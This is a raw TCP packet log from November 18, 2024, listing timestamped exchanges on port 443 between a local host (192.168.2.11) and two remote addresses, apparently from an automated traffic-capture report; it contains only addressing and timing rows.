Nov 18, 2024 09:58:11.759875059 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.770376921 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.770392895 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.770535946 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.770551920 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.809998035 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.810029030 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.810262918 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.810283899 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.813688040 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.813704014 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.813909054 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.813916922 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.816836119 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.816855907 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.816925049 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.816943884 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.816956997 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.820764065 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.820780993 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.820837975 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.820844889 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.820882082 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.875025034 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.896646023 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.896676064 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.896825075 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.896833897 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.896886110 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.907129049 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.907150984 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.907264948 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.907264948 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.907274961 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.907332897 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.915977955 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.916003942 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.916115046 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.916121960 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.916173935 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.148771048 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.148799896 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.148870945 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.148907900 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.148914099 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.148931026 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.148961067 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149044037 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149137974 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.149159908 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.149197102 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149202108 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.149219036 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149233103 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.149259090 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.149307966 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149307966 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.149315119 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150507927 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150532007 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150579929 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.150585890 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150604010 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.150839090 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150866032 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.150897026 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.150907993 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.151021957 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.152211905 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.152234077 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.152312994 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.152319908 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.152350903 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.152378082 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.152451038 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.152451038 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.152457952 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154670000 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154700041 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.154706001 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154735088 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154788017 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.154788017 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.154798031 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154820919 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154915094 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.154922009 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.154988050 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155006886 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155064106 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155067921 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155083895 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155124903 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155124903 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155132055 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155144930 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155148029 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155174971 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155239105 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155308008 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155344963 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155455112 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155455112 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155461073 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155504942 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155880928 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155903101 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.155961990 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.155967951 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.156012058 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.156049967 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.156177998 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.156203985 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.156333923 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.156339884 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.156394005 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.157001972 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157023907 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157089949 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.157094955 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157190084 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.157624960 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157649994 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157691002 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.157696009 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.157725096 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.157778978 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158535957 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158559084 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158623934 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158627987 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158642054 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158678055 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158678055 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158684969 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158703089 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158705950 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.158742905 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.158752918 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159516096 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159538031 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159614086 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159620047 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159646988 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159655094 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159769058 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159781933 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159884930 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159892082 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.159924030 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.159953117 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.160341024 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.160345078 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.160423994 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.160587072 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.160605907 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.160643101 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.160649061 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.160679102 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.160679102 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.161427975 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.161448956 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.161508083 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.161524057 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.186842918 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.186857939 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.186966896 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266324997 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266356945 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266438961 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266458035 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266501904 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266616106 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266638041 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266704082 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266710043 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266721010 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266786098 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266791105 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266845942 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266876936 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.266884089 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.266921043 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267735004 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267756939 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267811060 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267843962 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267843962 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267851114 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267867088 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267936945 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267956972 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.267991066 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267991066 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.267997026 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.268026114 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.268163919 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.268188953 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.268232107 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.268239021 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.268248081 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269207954 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269232035 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269296885 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269296885 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269304037 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269316912 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269347906 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269414902 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269414902 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269423008 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269462109 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269488096 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.269546986 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269546986 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.269556999 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.312566996 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.423199892 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.423227072 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.423288107 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.423290968 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.423342943 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.427656889 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.427664042 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.427918911 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.431085110 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.431168079 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:12.431174994 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.431240082 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.492463112 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.751085997 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:12.980616093 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:54.284780025 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.284802914 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:54.284868002 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.287944078 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.287955999 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:54.899519920 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:54.899616957 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.902398109 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.902409077 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:54.902676105 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:54.953192949 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.975903034 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.975977898 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:54.976073980 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.541225910 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.541356087 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.541416883 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.543987989 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.544004917 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.544017076 CET	49972	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.544023037 CET	443	49972	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.621239901 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.621289015 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:55.621362925 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.622667074 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:55.622684002 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.233129978 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.233256102 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.235414982 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.235430956 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.235681057 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.236807108 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.236841917 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.236891985 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.724814892 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.725337029 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.725383997 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.725409985 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.725435019 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.725505114 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.725895882 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.725953102 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.726567030 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.726911068 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.726963997 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.726973057 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.781404018 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.781424999 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.828233957 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.842139959 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.842607975 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.842700005 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.842730045 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843295097 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843348026 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.843348026 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843364954 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843405008 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.843468904 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843552113 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843573093 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.843602896 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843615055 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.843615055 CET	49973	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.843624115 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.843630075 CET	443	49973	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.864253998 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.864295006 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:56.864384890 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.864794970 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:56.864809036 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:57.473078966 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:57.473228931 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:57.474832058 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:57.474849939 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:57.475095987 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:57.476818085 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:57.477029085 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:57.477051973 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:59.414573908 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:59.414813042 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:59.414911032 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:59.414947987 CET	49974	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:59.414966106 CET	443	49974	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:59.442178011 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:59.442262888 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:58:59.442390919 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:59.442728996 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:58:59.442753077 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:00.059053898 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:00.059340000 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:00.060755968 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:00.060772896 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:00.061024904 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:00.062416077 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:00.062690020 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:00.062871933 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:00.062938929 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:00.103337049 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.026046038 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.026153088 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.026236057 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.026487112 CET	49975	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.026510000 CET	443	49975	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.154726982 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.154774904 CET	443	49976	172.67.128.233	192.168.2.11
Nov 18, 2024 09:59:01.154905081 CET	49976	443	192.168.2.11	172.67.128.233
Nov 18, 2024 09:59:01.155329943 CET	49976	443	192.168.2.11	172.67.128.233
